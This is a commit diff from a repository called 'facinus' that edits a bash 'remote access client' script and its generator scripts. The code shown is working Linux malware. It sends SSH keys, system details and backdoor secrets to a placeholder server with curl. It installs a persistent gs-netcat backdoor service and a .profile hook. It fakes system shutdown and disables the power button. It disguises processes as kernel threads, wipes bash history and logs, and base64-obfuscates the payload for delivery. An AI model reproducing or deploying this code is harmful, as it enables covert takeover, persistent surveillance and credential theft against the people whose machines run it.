elleoma/facinus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

set power button functionalitty to ignore state

Browse Source
This commit is contained in:
Amoelle
2025-04-20 22:02:57 +03:00
parent 569f91e24e
commit 7dcaa31a6b
3 changed files with 4 additions and 87 deletions
Download Patch File Download Diff File Expand all files Collapse all files

79
scripts/deploy/y
View File

@@ -1,19 +1,12 @@
#!/bin/bash #!/bin/bash
# FACINUS Remote Access Client
# This script sets up remote access capabilities on the target system
# ================= CONFIGURATION =================
SERVER_URL="SERVER_PLACEHOLDER" SERVER_URL="SERVER_PLACEHOLDER"
LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php" LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php"
AUTH_TOKEN="TOKEN_PLACEHOLDER" AUTH_TOKEN="TOKEN_PLACEHOLDER"
VERSION="1.1.0"
# ================================================
# Create temporary directory
TEMP_DIR=$(mktemp -d) TEMP_DIR=$(mktemp -d)
trap 'rm -rf "$TEMP_DIR"' EXIT trap 'rm -rf "$TEMP_DIR"' EXIT
# ------- UTILITY FUNCTIONS -------
log_cmd() { log_cmd() {
local cmd="$1" local cmd="$1"
local desc="$2" local desc="$2"
@@ -23,7 +16,6 @@ log_cmd() {
echo "$ $cmd" >> "$log_file" echo "$ $cmd" >> "$log_file"
echo "--------------------------------------------" >> "$log_file" echo "--------------------------------------------" >> "$log_file"
# Execute command and capture output and status
local output local output
output=$(eval "$cmd" 2>&1) output=$(eval "$cmd" 2>&1)
local status=$? local status=$?
@@ -63,7 +55,6 @@ send_logs() {
local sysinfo=$(get_system_info) local sysinfo=$(get_system_info)
local hostname=$(hostname) local hostname=$(hostname)
# Submit logs to the server
curl -s -X POST "$LOG_ENDPOINT" \ curl -s -X POST "$LOG_ENDPOINT" \
-F "auth_token=$AUTH_TOKEN" \ -F "auth_token=$AUTH_TOKEN" \
-F "hostname=$hostname" \ -F "hostname=$hostname" \
@@ -75,7 +66,6 @@ send_logs() {
} }
detect_package_manager() { detect_package_manager() {
# Detect the system's package manager
if command -v apt &> /dev/null; then if command -v apt &> /dev/null; then
echo "apt" echo "apt"
elif command -v dnf &> /dev/null; then elif command -v dnf &> /dev/null; then
@@ -91,7 +81,6 @@ detect_package_manager() {
fi fi
} }
# ------- INSTALLATION FUNCTIONS -------
install_ssh() { install_ssh() {
local log_file="$TEMP_DIR/ssh_install.log" local log_file="$TEMP_DIR/ssh_install.log"
touch "$log_file" touch "$log_file"
@@ -135,18 +124,15 @@ install_ssh() {
;; ;;
esac esac
# Get SSH key if it exists
if [ -f ~/.ssh/id_rsa.pub ]; then if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key"
else else
# Try to create a new key if it doesn't exist
log_cmd "ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa" "Generating SSH key" "$log_file" log_cmd "ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa" "Generating SSH key" "$log_file"
if [ -f ~/.ssh/id_rsa.pub ]; then if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key"
fi fi
fi fi
# Send SSH configuration
local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}') local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}')
[ -z "$ssh_port" ] && ssh_port=22 [ -z "$ssh_port" ] && ssh_port=22
@@ -161,7 +147,6 @@ setup_wol() {
echo "[*] Setting up Wake-on-LAN..." echo "[*] Setting up Wake-on-LAN..."
# Install ethtool if needed
local pkg_manager=$(detect_package_manager) local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in case "$pkg_manager" in
apt) apt)
@@ -189,7 +174,6 @@ setup_wol() {
;; ;;
esac esac
# Get the primary interface
local interface=$(ip route | grep default | awk '{print $5}' | head -n1) local interface=$(ip route | grep default | awk '{print $5}' | head -n1)
if [ -z "$interface" ]; then if [ -z "$interface" ]; then
@@ -197,13 +181,10 @@ setup_wol() {
return 1 return 1
fi fi
# Check current WoL status
if ethtool "$interface" | grep -q "Wake-on: g"; then if ethtool "$interface" | grep -q "Wake-on: g"; then
echo "[+] Wake-on-LAN is already enabled on $interface." echo "[+] Wake-on-LAN is already enabled on $interface."
# Try to enable WoL
log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file" log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file"
# Create persistent configuration
cat > "$TEMP_DIR/wol.service" << EOF cat > "$TEMP_DIR/wol.service" << EOF
[Unit] [Unit]
Description=Enable Wake-on-LAN on $interface Description=Enable Wake-on-LAN on $interface
@@ -223,9 +204,7 @@ EOF
log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file" log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file"
log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file" log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file"
# Get MAC address for WoL
local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}') local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}')
send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config" send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config"
echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)." echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)."
@@ -241,7 +220,6 @@ setup_fake_poweroff() {
echo "[*] Setting up fake poweroff..." echo "[*] Setting up fake poweroff..."
# Create the fake poweroff script
cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF' cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF'
#!/bin/bash #!/bin/bash
# This script intercepts poweroff/shutdown commands and fakes a shutdown # This script intercepts poweroff/shutdown commands and fakes a shutdown
@@ -315,6 +293,9 @@ sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/sbin/shutdown
EOF EOF
log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file" log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file"
log_cmd "sudo sed -i 's/^#HandlePowerKey=poweroff/HandlePowerKey=ignore/' /etc/systemd/logind.conf" "Disabling pressing power key" "$log_file"
log_cmd "sudo sed -i 's/^#HandlePowerKeyLongPress=poweroff/HandlePowerKeyLongPress=ignore/' /etc/systemd/logind.conf" "Disabling long press power key" "$log_file"
log_cmd "sudo sed -i 's/^#HandleLidSwitch=suspend/HandleLidSwitch=ignore/' /etc/systemd/logind.conf" "Disabling lid switch" "$log_file"
send_logs "$log_file" "Fake poweroff installed" "fake_poweroff" send_logs "$log_file" "Fake poweroff installed" "fake_poweroff"
@@ -328,7 +309,6 @@ install_gsocket() {
echo "[*] Installing gsocket for remote access..." echo "[*] Installing gsocket for remote access..."
# Install dependencies
local pkg_manager=$(detect_package_manager) local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in case "$pkg_manager" in
apt) apt)
@@ -349,18 +329,15 @@ install_gsocket() {
;; ;;
esac esac
# build gsocket
if ! command -v gs-netcat &>/dev/null; then if ! command -v gs-netcat &>/dev/null; then
log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file" log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file"
log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file" log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file"
log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file" log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file"
fi fi
# Generate a unique secret
local gs_root_secret=$(gs-netcat -g) local gs_root_secret=$(gs-netcat -g)
local gs_user_secret=$(gs-netcat -g) local gs_user_secret=$(gs-netcat -g)
# Create systemd service for persistent connection
cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF
[Unit] [Unit]
Description=GSocket Remote Access Description=GSocket Remote Access
@@ -383,17 +360,12 @@ EOF
log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file" log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file"
log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file" log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file"
# Also put a gs-netcat backdoor in user's .profile
log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file" log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file"
log_cmd "source ~/.profile" "Reloading .profile" "$log_file" log_cmd "source ~/.profile" "Reloading .profile" "$log_file"
# Create connection instructions
cat > "$TEMP_DIR/gsocket_info.txt" << EOF cat > "$TEMP_DIR/gsocket_info.txt" << EOF
GSocket Connection Information GSocket Connection Information
============================= =============================
Root secret: $gs_root_secret
User secret: $gs_user_secret
Connect as root: gs-netcat -s $gs_root_secret -i Connect as root: gs-netcat -s $gs_root_secret -i
Connect as user: gs-netcat -s $gs_user_secret -i Connect as user: gs-netcat -s $gs_user_secret -i
============================= =============================
@@ -404,7 +376,7 @@ EOF
send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret" send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret"
send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info" send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info"
echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret" echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret -i"
} }
setup_stealth() { setup_stealth() {
@@ -412,47 +384,18 @@ setup_stealth() {
touch "$log_file" touch "$log_file"
echo "[*] Setting up stealth mode..." echo "[*] Setting up stealth mode..."
# Hide processes by creating a systemd unit with hidden name
cat > "$TEMP_DIR/_.service" << 'EOF'
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do sleep 3600; done'
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/_.service" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable _.service" "Enabling hidden service" "$log_file"
log_cmd "sudo systemctl start _.service" "Starting hidden service" "$log_file"
# Set up process name obfuscation script
cat > "$TEMP_DIR/obfuscate.sh" << 'EOF' cat > "$TEMP_DIR/obfuscate.sh" << 'EOF'
#!/bin/bash #!/bin/bash
# This script allows running commands with an obfuscated process name
# Function to run a command with an obfuscated name
obfuscate_run() { obfuscate_run() {
local fake_name="$1" local fake_name="$1"
shift shift
exec -a "$fake_name" "$@" exec -a "$fake_name" "$@"
} }
# Install the function to user's bashrc
if ! grep -q "obfuscate_run" ~/.bashrc; then if ! grep -q "obfuscate_run" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT' cat >> ~/.bashrc << 'EOT'
# Obfuscation function
obfuscate_run() { obfuscate_run() {
local fake_name="$1" local fake_name="$1"
shift shift
@@ -461,7 +404,6 @@ obfuscate_run() {
EOT EOT
fi fi
# Create helper aliases
if ! grep -q "alias stealthy" ~/.bashrc; then if ! grep -q "alias stealthy" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT' cat >> ~/.bashrc << 'EOT'
alias stealthy='obfuscate_run "[khugepageds]"' alias stealthy='obfuscate_run "[khugepageds]"'
@@ -469,13 +411,11 @@ alias hidden='obfuscate_run "[migration/0]"'
EOT EOT
fi fi
# Install a cron job to clear bash history periodically
(crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab - (crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab -
EOF EOF
log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file" log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file"
# Create log rotation to clean service logs
cat > "$TEMP_DIR/clean-logs.service" << 'EOF' cat > "$TEMP_DIR/clean-logs.service" << 'EOF'
[Unit] [Unit]
Description=Clean System Logs Description=Clean System Logs
@@ -489,7 +429,6 @@ ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d'
[Install] [Install]
WantedBy=default.target WantedBy=default.target
EOF EOF
sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/ sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/
cat > "$TEMP_DIR/clean-logs.timer" << 'EOF' cat > "$TEMP_DIR/clean-logs.timer" << 'EOF'
@@ -515,30 +454,20 @@ EOF
echo "[+] Stealth mode configured." echo "[+] Stealth mode configured."
} }
# ------- MAIN EXECUTION -------
main() { main() {
local log_file="$TEMP_DIR/main.log" local log_file="$TEMP_DIR/main.log"
touch "$log_file" touch "$log_file"
echo "[*] Beginning setup..." echo "[*] Beginning setup..."
echo "[*] Target system: $(hostname) ($(whoami))" echo "[*] Target system: $(hostname) ($(whoami))"
sudo apt install -y curl jq &> /dev/null || true sudo apt install -y curl jq &> /dev/null || true
# Send initial system info
send_logs "$log_file" "$(get_system_info)" "system_info" send_logs "$log_file" "$(get_system_info)" "system_info"
# Install components based on flags
install_ssh install_ssh
setup_wol setup_wol
setup_fake_poweroff setup_fake_poweroff
install_gsocket install_gsocket
setup_stealth setup_stealth
echo "[+] Setup complete." echo "[+] Setup complete."
echo "[+] All logs and credentials have been sent to the server." echo "[+] All logs and credentials have been sent to the server."
} }
# Run the main function
main main

7
scripts/detect_system.sh
View File

@@ -1,16 +1,12 @@
#!/bin/bash #!/bin/bash
# Detect system distro and architecture
detect_system() { detect_system() {
# Detect architecture
ARCH=$(uname -m) ARCH=$(uname -m)
# Detect distribution
if [ -f /etc/os-release ]; then if [ -f /etc/os-release ]; then
. /etc/os-release . /etc/os-release
DISTRO_NAME=${ID,,} # Convert to lowercase DISTRO_NAME=${ID,,} # Convert to lowercase
# Check if it's an Arch-based distro
for arch_distro in "${ARCH_DISTROS[@]}"; do for arch_distro in "${ARCH_DISTROS[@]}"; do
if [[ "$DISTRO_NAME" == *"$arch_distro"* ]]; then if [[ "$DISTRO_NAME" == *"$arch_distro"* ]]; then
DISTRO="arch" DISTRO="arch"
@@ -18,7 +14,6 @@ detect_system() {
fi fi
done done
# Check if it's a Debian-based distro
for deb_distro in "${DEB_DISTROS[@]}"; do for deb_distro in "${DEB_DISTROS[@]}"; do
if [[ "$DISTRO_NAME" == *"$deb_distro"* ]]; then if [[ "$DISTRO_NAME" == *"$deb_distro"* ]]; then
DISTRO="debian" DISTRO="debian"
@@ -26,7 +21,6 @@ detect_system() {
fi fi
done done
# Check if it's an RPM-based distro
for rpm_distro in "${RPM_DISTROS[@]}"; do for rpm_distro in "${RPM_DISTROS[@]}"; do
if [[ "$DISTRO_NAME" == *"$rpm_distro"* ]]; then if [[ "$DISTRO_NAME" == *"$rpm_distro"* ]]; then
DISTRO="redhat" DISTRO="redhat"
@@ -34,7 +28,6 @@ detect_system() {
fi fi
done done
# If we can't determine the distro family, just use the ID
DISTRO="$DISTRO_NAME" DISTRO="$DISTRO_NAME"
elif [ -f /etc/arch-release ]; then elif [ -f /etc/arch-release ]; then
DISTRO="arch" DISTRO="arch"

5
scripts/generate_scripts.sh
View File

@@ -6,14 +6,11 @@ generate_client_scripts() {
echo "Generating client deployment scripts..." echo "Generating client deployment scripts..."
generate_main_client_script generate_main_client_script
generate_obfuscated_script generate_obfuscated_script
generate_presets generate_presets
} }
generate_main_client_script() { generate_main_client_script() {
# Copy the script to the server
cp "$DEPLOY_DIR/y" "$SERVER_ROOT" cp "$DEPLOY_DIR/y" "$SERVER_ROOT"
# Replace placeholders in the script # Replace placeholders in the script
@@ -26,7 +23,6 @@ generate_main_client_script() {
generate_obfuscated_script() { generate_obfuscated_script() {
echo "Creating obfuscated version of the client script..." echo "Creating obfuscated version of the client script..."
# Base64 encode the script to obfuscate it
base64 -w0 < "$DEPLOY_DIR/y" > "$DEPLOY_DIR/y.b64" base64 -w0 < "$DEPLOY_DIR/y" > "$DEPLOY_DIR/y.b64"
cp "$DEPLOY_DIR/x" "$SERVER_ROOT/" cp "$DEPLOY_DIR/x" "$SERVER_ROOT/"
@@ -39,7 +35,6 @@ generate_obfuscated_script() {
generate_presets() { generate_presets() {
echo "Creating installation presets..." echo "Creating installation presets..."
# Replace placeholders
for preset in "$DEPLOY_DIR/minimal" "$DEPLOY_DIR/full" "$DEPLOY_DIR/quiet"; do for preset in "$DEPLOY_DIR/minimal" "$DEPLOY_DIR/full" "$DEPLOY_DIR/quiet"; do
sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$preset" sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$preset"
cp "$preset" "$SERVER_ROOT/" cp "$preset" "$SERVER_ROOT/"